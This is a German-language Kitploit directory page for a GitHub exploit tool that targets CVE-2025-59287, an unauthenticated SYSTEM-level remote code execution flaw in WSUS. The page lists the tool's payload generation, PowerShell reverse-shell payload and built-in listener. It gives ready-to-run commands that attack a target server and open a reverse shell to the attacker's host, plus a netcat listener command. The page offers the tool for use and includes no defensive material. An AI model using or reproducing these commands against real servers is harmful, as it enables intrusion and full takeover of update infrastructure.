Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59287 — Automatisierter Exploit für CVE-2025-59287, eine nicht authentifizierte RCE in WSUS, mit Payload-Erzeugung, Reverse-Shell-Listener und AES-Verschlüsselung mit fest codierten Schlüsseln. | Kitploit
Tools/GitHubGitHub/garvitv14/cve-2025-59287
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Automatisierter Exploit für CVE-2025-59287, eine nicht authentifizierte RCE in WSUS, mit Payload-Erzeugung, Reverse-Shell-Listener und AES-Verschlüsselung mit fest codierten Schlüsseln.

Repository anzeigen
16277vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59287 WSUS RCE Exploit

Automatisierter Exploit für die Schwachstelle zur nicht authentifizierten Remote-Codeausführung in Windows Server Update Services (WSUS).

Details zur Schwachstelle

  • CVE-ID: CVE-2025-59287
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Keine erforderlich
  • Auswirkung: Remote-Codeausführung als SYSTEM

Funktionen

✅ Vollautomatische Payload-Generierung
✅ Automatischer Download der ysoserial.NET-Abhängigkeit
✅ Integrierter Reverse-Shell-Listener
✅ Plattformübergreifende Unterstützung (Windows/Linux/Mac)
✅ AES-Verschlüsselung mit WSUS-Hardcoded-Keys
✅ PowerShell-Reverse-Shell-Payload

Anforderungen

pip install -r requirements.txt

Python-Abhängigkeiten

.NET-Runtime (automatisch erkannt)

  • Windows: .NET Framework (integriert)
  • Linux/Mac: Wine oder Mono Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

Installation

Exploit-Dateien klonen oder herunterladen

cd CVE-2025-59287-exploit

Exploit ausführen (lädt ysoserial.NET automatisch herunter)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

Verwendung

Grundlegende Ausnutzung

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

Falls eine Session auf einem anderen Listener gewünscht ist

Terminal 1: Netcat-Listener starten

nc -lvnp 4444

Terminal 2: Exploit ohne integrierten Listener ausführen

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

Tool herunterladen